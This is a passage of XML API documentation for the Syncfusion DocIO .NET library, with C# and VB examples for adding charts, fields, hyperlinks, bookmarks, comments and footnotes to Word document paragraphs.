                picture.Height = 100
                picture.Width = 100
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendChart(System.Object[][],System.Single,System.Single)">
            <summary>
            Appends a chart to the end of the paragraph with the specified data, width and height.
            </summary>
            <param name="data">The two-dimensional <see cref="T:System.Object"/> array that specifies the data for chart.</param>
            <param name="width">The <b>float</b> that represents the width for chart.</param>
            <param name="height">The <b>float</b> that represents the height for chart.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WChart"/> instance that represents the newly added chart.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
            <example> The following example illustrates how to append new chart to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Input data for chart
                object[][] data = new object[6][];
                for (int i = 0; i &lt; 6; i++)
                    data[i] = new object[3];
                data[0][0] = "";
                data[1][0] = "Gravad lax";
                data[2][0] = "Louisiana Hot spiced Okara";
                data[3][0] = "Mascarpone Fabioli";
                data[4][0] = "Wimmers gute SemmelKnodel";
                data[5][0] = "Maxilaku";
                data[0][1] = "Sum of Purchases";
                data[1][1] = 286;
                data[2][1] = 680;
                data[3][1] = 288;
                data[4][1] = 200;
                data[5][1] = 731;
                data[0][2] = "Sum of Future Expenses";
                data[1][2] = 1300;
                data[2][2] = 700;
                data[3][2] = 1280;
                data[4][2] = 1200;
                data[5][2] = 2660;        ///     
                //Create and Append chart to the paragraph
                WChart chart = paragraph.AppendChart(data, 470, 300);
                //Set chart type and title
                chart.ChartTitle = "Purchase Details";
                chart.ChartTitleArea.FontName = "Calibri";
                chart.ChartTitleArea.Size = 14;
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None;          
                //Set series type 
                chart.Series[0].SerieType = OfficeChartType.Line_Markers;
                chart.Series[1].SerieType = OfficeChartType.Bar_Clustered;
                chart.PrimaryCategoryAxis.Title = "Products";
                chart.PrimaryValueAxis.Title = "In Dollars";
                //Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom;
                //Save the document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Input data for chart
                Dim data As Object()() = New Object(5)() {}
                For i As Integer = 0 To 5
                    data(i) = New Object(2) {}
                Next
                data(0)(0) = ""
                data(1)(0) = "Gravad lax"
                data(2)(0) = "Louisiana Hot spiced Okara"
                data(3)(0) = "Mascarpone Fabioli"
                data(4)(0) = "Wimmers gute SemmelKnodel"
                data(5)(0) = "Maxilaku"
                data(0)(1) = "Sum of Purchases"
                data(1)(1) = 286
                data(2)(1) = 680
                data(3)(1) = 288
                data(4)(1) = 200
                data(5)(1) = 731
                data(0)(2) = "Sum of Future Expenses"
                data(1)(2) = 1300
                data(2)(2) = 700
                data(3)(2) = 1280
                data(4)(2) = 1200
                data(5)(2) = 2660
                'Create and Append chart to the paragraph
                Dim chart As WChart = paragraph.AppendChart(data, 470, 300)
                'Set chart type and title
                chart.ChartTitle = "Purchase Details"
                chart.ChartTitleArea.FontName = "Calibri"
                chart.ChartTitleArea.Size = 14
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None
                'Set series type 
                chart.Series(0).SerieType = OfficeChartType.Line_Markers
                chart.Series(1).SerieType = OfficeChartType.Bar_Clustered
                chart.PrimaryCategoryAxis.Title = "Products"
                chart.PrimaryValueAxis.Title = "In Dollars"
                'Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom
                'Save the document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendChart(System.Single,System.Single)">
            <summary>
            Appends chart to the end of the paragraph with the specified width and height.
            </summary>
            <param name="width">The <b>float</b> that represents the width for chart.</param>
            <param name="height">The <b>float</b> that represents the height for chart.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WChart"/> instance that represents the newly added chart.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
            <example> The following example illustrates how to append new chart to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Create and Append chart to the paragraph
                WChart chart = paragraph.AppendChart(446, 270);
                //Set chart type
                chart.ChartType = OfficeChartType.Pie;
                //Set chart title
                chart.ChartTitle = "Best Selling Products";
                chart.ChartTitleArea.FontName = "Calibri";
                chart.ChartTitleArea.Size = 14;
                //Set data for chart
                chart.ChartData.SetValue(1, 1, "");
                chart.ChartData.SetValue(1, 2, "Sales");
                chart.ChartData.SetValue(2, 1, "Cote de Blaye");
                chart.ChartData.SetValue(2, 2, 141.396);
                chart.ChartData.SetValue(3, 1, "Thuringer Rostbratwurst");
                chart.ChartData.SetValue(3, 2, 80.368);
                chart.ChartData.SetValue(4, 1, "Raclette Courdavault");
                chart.ChartData.SetValue(4, 2, 71.155);
                chart.ChartData.SetValue(5, 1, "Tarte au sucre");
                chart.ChartData.SetValue(5, 2, 47.234);
                chart.ChartData.SetValue(6, 1, "Camembert Pierrot");
                chart.ChartData.SetValue(6, 2, 46.825);
                chart.ChartData.SetValue(7, 1, "Gnocchi di nonna Alice");
                chart.ChartData.SetValue(7, 2, 42.593);
                chart.ChartData.SetValue(8, 1, "Manjimup Dried Apples");
                chart.ChartData.SetValue(8, 2, 41.819);
                chart.ChartData.SetValue(9, 1, "Alice Mutton");
                chart.ChartData.SetValue(9, 2, 32.698);
                chart.ChartData.SetValue(10, 1, "Carnarvon Tigers");
                chart.ChartData.SetValue(10, 2, 29.171);
                chart.ChartData.SetValue(11, 1, "R�ssle Sauerkraut.");
                chart.ChartData.SetValue(11, 2, 25.696);
                //Create a new chart series with the name �Sales�
                IOfficeChartSerie pieSeries = chart.Series.Add("Sales");
                pieSeries.Values = chart.ChartData[2, 2, 11, 2];
                //Set data label
                pieSeries.DataPoints.DefaultDataPoint.DataLabels.IsValue = true;
                pieSeries.DataPoints.DefaultDataPoint.DataLabels.Position = OfficeDataLabelPosition.Outside;
                //Set background color
                chart.ChartArea.Fill.ForeColor = Color.FromArgb(242, 242, 242);
                chart.PlotArea.Fill.ForeColor = Color.FromArgb(242, 242, 242);
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None;
                //Set category labels
                chart.PrimaryCategoryAxis.CategoryLabels = chart.ChartData[2, 1, 11, 1];            
                //Save the document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Create and Append chart to the paragraph
                Dim chart As WChart = paragraph.AppendChart(446, 270)
                'Set chart type
                chart.ChartType = OfficeChartType.Pie
                'Set chart title
                chart.ChartTitle = "Best Selling Products"
                chart.ChartTitleArea.FontName = "Calibri"
                chart.ChartTitleArea.Size = 14
                'Set data for chart
                chart.ChartData.SetValue(1, 1, "")
                chart.ChartData.SetValue(1, 2, "Sales")
                chart.ChartData.SetValue(2, 1, "Cote de Blaye")
                chart.ChartData.SetValue(2, 2, 141.396)
                chart.ChartData.SetValue(3, 1, "Thuringer Rostbratwurst")
                chart.ChartData.SetValue(3, 2, 80.368)
                chart.ChartData.SetValue(4, 1, "Raclette Courdavault")
                chart.ChartData.SetValue(4, 2, 71.155)
                chart.ChartData.SetValue(5, 1, "Tarte au sucre")
                chart.ChartData.SetValue(5, 2, 47.234)
                chart.ChartData.SetValue(6, 1, "Camembert Pierrot")
                chart.ChartData.SetValue(6, 2, 46.825)
                chart.ChartData.SetValue(7, 1, "Gnocchi di nonna Alice")
                chart.ChartData.SetValue(7, 2, 42.593)
                chart.ChartData.SetValue(8, 1, "Manjimup Dried Apples")
                chart.ChartData.SetValue(8, 2, 41.819)
                chart.ChartData.SetValue(9, 1, "Alice Mutton")
                chart.ChartData.SetValue(9, 2, 32.698)
                chart.ChartData.SetValue(10, 1, "Carnarvon Tigers")
                chart.ChartData.SetValue(10, 2, 29.171)
                chart.ChartData.SetValue(11, 1, "R�ssle Sauerkraut.")
                'Create a new chart series with the name �Sales�
                Dim pieSeries As IOfficeChartSerie = chart.Series.Add("Sales")
                pieSeries.Values = chart.ChartData(2, 2, 11, 2)
                'Set data label
                pieSeries.DataPoints.DefaultDataPoint.DataLabels.IsValue = True
                pieSeries.DataPoints.DefaultDataPoint.DataLabels.Position = OfficeDataLabelPosition.Outside
                'Set background color
                chart.ChartArea.Fill.ForeColor = Color.FromArgb(242, 242, 242)
                chart.PlotArea.Fill.ForeColor = Color.FromArgb(242, 242, 242)
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None
                'Set category labels
                chart.PrimaryCategoryAxis.CategoryLabels = chart.ChartData(2, 1, 11, 1)
                'Save the document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendChart(System.IO.Stream,System.Int32,System.String,System.Single,System.Single)">
            <summary>
            Appends chart to the end of the paragraph from the excel file with specified sheet number, range of data, width, and height.
            </summary>
            <param name="excelStream">The excel stream that has data for chart [Excel stream should be "*.xlsx" format].</param>
            <param name="sheetNumber">The <b>integer </b> represents the worksheet number that has data for chart.</param>
            <param name="dataRange">The <b>string</b> represents the data range in the worksheet from which the chart is to be created.</param>
            <param name="width">The <b>float</b> that represents the width for chart.</param>
            <param name="height">The <b>float</b> that represents the height for chart.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WChart"/> instance that represents the newly added chart.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
            <example> The following example illustrates how to append new chart to the paragraph using the excel stream.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the excel file as stream
                Stream excelStream = File.OpenRead("Excel_Template.xlsx");
                //Create and Append chart to the paragraph with excel stream as parameter
                WChart chart = paragraph.AppendChart(excelStream, 1, "B2:C6", 470, 300);
                //Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered;
                chart.ChartTitle = "Purchase Details";
                chart.ChartTitleArea.FontName = "Calibri";
                chart.ChartTitleArea.Size = 14;
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None;       
                //Set name to chart series            
                chart.Series[0].Name = "Sum of Purchases";
                chart.Series[1].Name = "Sum of Future Expenses";
                chart.PrimaryCategoryAxis.Title = "Products";
                chart.PrimaryValueAxis.Title = "In Dollars";
                //Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom;
                //Save the document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the excel file as stream
                Dim excelStream As Stream = File.OpenRead("Excel_Template.xlsx")
                'Create and Append chart to the paragraph with excel stream as parameter
                Dim chart As WChart = paragraph.AppendChart(excelStream, 1, "B2:C6", 470, 300)
                'Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered
                chart.ChartTitle = "Purchase Details"
                chart.ChartTitleArea.FontName = "Calibri"
                chart.ChartTitleArea.Size = 14
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None
                'Set name to chart series            
                chart.Series(0).Name = "Sum of Purchases"
                chart.Series(1).Name = "Sum of Future Expenses"
                chart.PrimaryCategoryAxis.Title = "Products"
                chart.PrimaryValueAxis.Title = "In Dollars"
                'Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom
                'Save the document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.DetectExcelFileFromStream(System.IO.Stream)">
            <summary>
            Method to identify the Excel file format
            </summary>
            <param name="stream">Excel file stream</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendField(System.String,Syncfusion.DocIO.FieldType)">
            <summary>
            Appends field to end of the paragraph with the specified field name and field type.
            </summary>
            <param name="fieldName">The <b>string </b>that specifies the field name.</param>
            <param name="fieldType">The <see cref="T:Syncfusion.DocIO.FieldType"/> member that specifies the type of the field.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWField"/> instance of the newly added field.</returns>
            <example> The following example illustrates how to append field to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an instance of WordDocument class (Empty Word Document)
                WordDocument document = new WordDocument();
                //Add a new section into the Word Document
                IWSection section = document.AddSection();
                //Add a new paragraph into Word document and append text into paragraph
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Today's Date: ");
                //Add the new Date field in Word document with field name and its type.
                WField field = paragraph.AppendField("Date", FieldType.FieldDate) as WField;
                //Field code used to describe how to display the date
                field.FieldCode = @"DATE  \@" + "\"MMMM d, yyyy\""; 
                //Save the document in the given name and format
                document.Save("Sample.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an instance of WordDocument class (Empty Word Document)
                Dim document As New WordDocument()
                'Add a new section into the Word Document
                Dim section As IWSection = document.AddSection()
                'Add a new paragraph into Word document and append text into paragraph
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Today's Date: ")
                'Add the new Date field in Word document with field name and its type.
                Dim field As WField = TryCast(paragraph.AppendField("Date", FieldType.FieldDate), WField)
                'Field code used to describe how to display the date
                field.FieldCode = "DATE  \@" + """MMMM d, yyyy"""
                'Save the document in the given name and format
                document.Save("Sample.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendHyperlink(System.String,System.String,Syncfusion.DocIO.DLS.HyperlinkType)">
            <summary>
            Appends the hyperlink to the paragraph with the specified link, display text and type of link.
            </summary>
            <param name="link">The <b>string</b> that specifies the link.</param>
            <param name="text">The <b>string </b> that specifies the text to display.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.HyperlinkType"/> member that specifies the link type.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWField"/> instance that represents the newly added hyperlink.</returns>
            <example> The following example illustrates how to append field to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Web Hyperlink:  ");
                paragraph = section.AddParagraph();
                //Append web hyperlink to the paragraph
                IWField field = paragraph.AppendHyperlink("http://www.syncfusion.com", "Syncfusion", HyperlinkType.WebLink);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Web Hyperlink:  ")
                paragraph = section.AddParagraph()
                'Append web hyperlink to the paragraph
                Dim field As IWField = paragraph.AppendHyperlink("http://www.syncfusion.com", "Syncfusion", HyperlinkType.WebLink)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendHyperlink(System.String,Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.HyperlinkType)">
            <summary>
            Appends the hyperlink to the paragraph with the specified link, picture and type of link.
            </summary>
            <param name="link">The <b>string</b> that specifies the link.</param>
            <param name="picture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture">picture</see> to display.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.HyperlinkType"/> member that specifies the link type.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWField"/> instance that represents the newly added hyperlink.</returns>
            <example> The following example illustrates how to append field to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Image Hyperlink");
                paragraph = section.AddParagraph();
                //Create a new image instance and load image 
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Append new image hyperlink to the paragraph
                paragraph.AppendHyperlink("http://www.syncfusion.com", picture, HyperlinkType.WebLink);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Image Hyperlink")
                paragraph = section.AddParagraph()
                'Create a new image instance and load image 
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Append new image hyperlink to the paragraph
                paragraph.AppendHyperlink("http://www.syncfusion.com", picture, HyperlinkType.WebLink)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendBookmarkStart(System.String)">
            <summary>
            Appends start of the bookmark with specified name to the paragraph.
            </summary>
            <param name="name">The <b>string</b> specifying the bookmark name.</param> 
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/> instance that represents the newly added bookmark start.</returns>
            <example> The following example illustrates how to add a bookmark to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an instance of WordDocument class (Empty Word Document)
                WordDocument document = new WordDocument();
                //Add a new section into the Word Document
                IWSection section = document.AddSection();
                //Add a new paragraph into Word document and append text into paragraph
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Northwind Database");
                paragraph.ParagraphFormat.HorizontalAlignment = Syncfusion.DocIO.DLS.HorizontalAlignment.Center; 
                //Add a paragraph into section
                paragraph = section.AddParagraph();
                //Add a new bookmark start into paragraph with name "Northwind"
                paragraph.AppendBookmarkStart("Northwind");
                //Add a text between the bookmark start and end into paragraph
                paragraph.AppendText("The Northwind sample database (Northwind.mdb) is included with all versions of Access. It provides data you can experiment with and database objects that demonstrate features you might want to implement in your own databases.");
                //Add a new bookmark end into paragraph with name " Northwind "
                paragraph.AppendBookmarkEnd("Northwind");
                //Add a text after the bookmark end
                paragraph.AppendText(" Using Northwind, you can become familiar with how a relational database is structured and how the database objects work together to help you enter, store, manipulate, and print your data.");
                //Save the document in the given name and format
                document.Save("Bookmarks.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an instance of WordDocument class (Empty Word Document)
                Dim document As New WordDocument()
                'Add a new section into the Word Document
                Dim section As IWSection = document.AddSection()
                'Add a new paragraph into Word document and append text into paragraph
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Northwind Database")
                paragraph.ParagraphFormat.HorizontalAlignment = Syncfusion.DocIO.DLS.HorizontalAlignment.Center
                'Add a paragraph into section
                paragraph = section.AddParagraph()
                'Add a new bookmark start into paragraph with name "Northwind"
                paragraph.AppendBookmarkStart("Northwind")
                'Add a text between the bookmark start and end into paragraph
                paragraph.AppendText("The Northwind sample database (Northwind.mdb) is included with all versions of Access. It provides data you can experiment with and database objects that demonstrate features you might want to implement in your own databases.")
                'Add a new bookmark end into paragraph with name " Northwind "
                paragraph.AppendBookmarkEnd("Northwind")
                'Add a text after the bookmark end
                paragraph.AppendText(" Using Northwind, you can become familiar with how a relational database is structured and how the database objects work together to help you enter, store, manipulate, and print your data.")
                'Save the document in the given name and format
                document.Save("Bookmarks.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendBookmarkEnd(System.String)">
            <summary>
            Appends end of the bookmark with specified name to the paragraph.
            </summary>
            <param name="name">The <b>string</b> specifying the bookmark name.</param> 
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/> instance that represents the newly added bookmark end.</returns>
            <example> The following example illustrates how to add a bookmark to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an instance of WordDocument class (Empty Word Document)
                WordDocument document = new WordDocument();
                //Add a new section into the Word Document
                IWSection section = document.AddSection();
                //Add a new paragraph into Word document and append text into paragraph
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Northwind Database");
                paragraph.ParagraphFormat.HorizontalAlignment = Syncfusion.DocIO.DLS.HorizontalAlignment.Center; 
                //Add a paragraph into section
                paragraph = section.AddParagraph();
                //Add a new bookmark start into paragraph with name "Northwind"
                paragraph.AppendBookmarkStart("Northwind");
                //Add a text between the bookmark start and end into paragraph
                paragraph.AppendText("The Northwind sample database (Northwind.mdb) is included with all versions of Access. It provides data you can experiment with and database objects that demonstrate features you might want to implement in your own databases.");
                //Add a new bookmark end into paragraph with name " Northwind "
                paragraph.AppendBookmarkEnd("Northwind");
                //Add a text after the bookmark end
                paragraph.AppendText(" Using Northwind, you can become familiar with how a relational database is structured and how the database objects work together to help you enter, store, manipulate, and print your data.");
                //Save the document in the given name and format
                document.Save("Bookmarks.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an instance of WordDocument class (Empty Word Document)
                Dim document As New WordDocument()
                'Add a new section into the Word Document
                Dim section As IWSection = document.AddSection()
                'Add a new paragraph into Word document and append text into paragraph
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Northwind Database")
                paragraph.ParagraphFormat.HorizontalAlignment = Syncfusion.DocIO.DLS.HorizontalAlignment.Center
                'Add a paragraph into section
                paragraph = section.AddParagraph()
                'Add a new bookmark start into paragraph with name "Northwind"
                paragraph.AppendBookmarkStart("Northwind")
                'Add a text between the bookmark start and end into paragraph
                paragraph.AppendText("The Northwind sample database (Northwind.mdb) is included with all versions of Access. It provides data you can experiment with and database objects that demonstrate features you might want to implement in your own databases.")
                'Add a new bookmark end into paragraph with name " Northwind "
                paragraph.AppendBookmarkEnd("Northwind")
                'Add a text after the bookmark end
                paragraph.AppendText(" Using Northwind, you can become familiar with how a relational database is structured and how the database objects work together to help you enter, store, manipulate, and print your data.")
                'Save the document in the given name and format
                document.Save("Bookmarks.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendComment(System.String)">
            <summary>
            Appends the comment to the paragraph.
            </summary>
            <param name="text">The <b>string</b> that specifies the comment.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WComment"/> instance that represents the newly added comment.</returns>
            <example> The following example illustrates how to add a comment to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Creates a new Word document.
                WordDocument document = new WordDocument();
                //Add a section and a paragraph in the document
                document.EnsureMinimal();
                IWParagraph paragraph = document.LastParagraph;
                //Append text to the paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua");
                //Add comment to a paragraph
                WComment comment = paragraph.AppendComment("comment test");
                //Specify the author of the comment
                comment.Format.User = "Peter";
                //Specify the initial of the author
                comment.Format.UserInitials = "St";
                //Save and close the Word document
                document.Save("Comment.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Creates a new Word document.
                Dim document As New WordDocument()
                'Add a section and a paragraph in the document
                document.EnsureMinimal()
                Dim paragraph As IWParagraph = document.LastParagraph
                'Append text to the paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua")
                'Add comment to a paragraph
                Dim comment As WComment = paragraph.AppendComment("comment test")
                'Specify the author of the comment
                comment.Format.User = "Peter"
                'Specify the initial of the author
                comment.Format.UserInitials = "St"
                'Save and close the Word document
                document.Save("Comment.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendFootnote(Syncfusion.DocIO.FootnoteType)">
            <summary>
            Appends footnote or endnotes specified by the type to the paragraph.
            </summary>
            <param name="type">The <see cref="T:Syncfusion.DocIO.FootnoteType"/> member that specifies the type of footnote.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WFootnote"/> instance that represents the newly added footnote.</returns>
            <remarks>The footnotes and endnotes are differentiated by the type of the footnote.</remarks>
            <example> The following example illustrates how to add a footnote to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocumnt document = new WordDocument();
                //Create a section
                IWSection section = document.AddSection();
                //Add a paragraph to a section
                IWParagraph paragraph = section.AddParagraph();
                //Append the text to paragraph
                paragraph.AppendText("Working with footnotes");
                //Formatting the text
                paragraph.ApplyStyle(BuiltinStyle.Heading1);
                //Add a paragraph to a section
                paragraph = section.AddParagraph();
                //Append the footnotes
                WFootnote footnote = (WFootnote) paragraph.AppendFootnote(Syncfusion.DocIO.FootnoteType.Footnote);
                //Set the footnote character format
                footnote.MarkerCharacterFormat.SubSuperScript = SubSuperScript.SuperScript;
                //Inserts the text into the paragraph
                paragraph.AppendText("Sample content for footnotes").CharacterFormat.Bold = true;
                //Add footnote text
                paragraph = footnote.TextBody.AddParagraph();
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Create a section
                Dim section As IWSection = document.AddSection()
                'Add a paragraph to a section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the text to paragraph
                paragraph.AppendText("Working with footnotes")
                'Formatting the text
                paragraph.ApplyStyle(BuiltinStyle.Heading1)
                'Add a paragraph to a section
                paragraph = section.AddParagraph()
                'Append the footnotes
                Dim footnote As WFootnote = DirectCast(paragraph.AppendFootnote(Syncfusion.DocIO.FootnoteType.Footnote), WFootnote)
                'Set the footnote character format
                footnote.MarkerCharacterFormat.SubSuperScript = SubSuperScript.SuperScript
                'Inserts the text into the paragraph
                paragraph.AppendText("Sample content for footnotes").CharacterFormat.Bold = True
                'Add footnote text
                paragraph = footnote.TextBody.AddParagraph()
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                �Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            <para>The following example illustrates how to add a endnote to the paragraph.</para>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new document
                WordDocument document = new WordDocument();
                //Create a section
                IWSection section = document.AddSection();
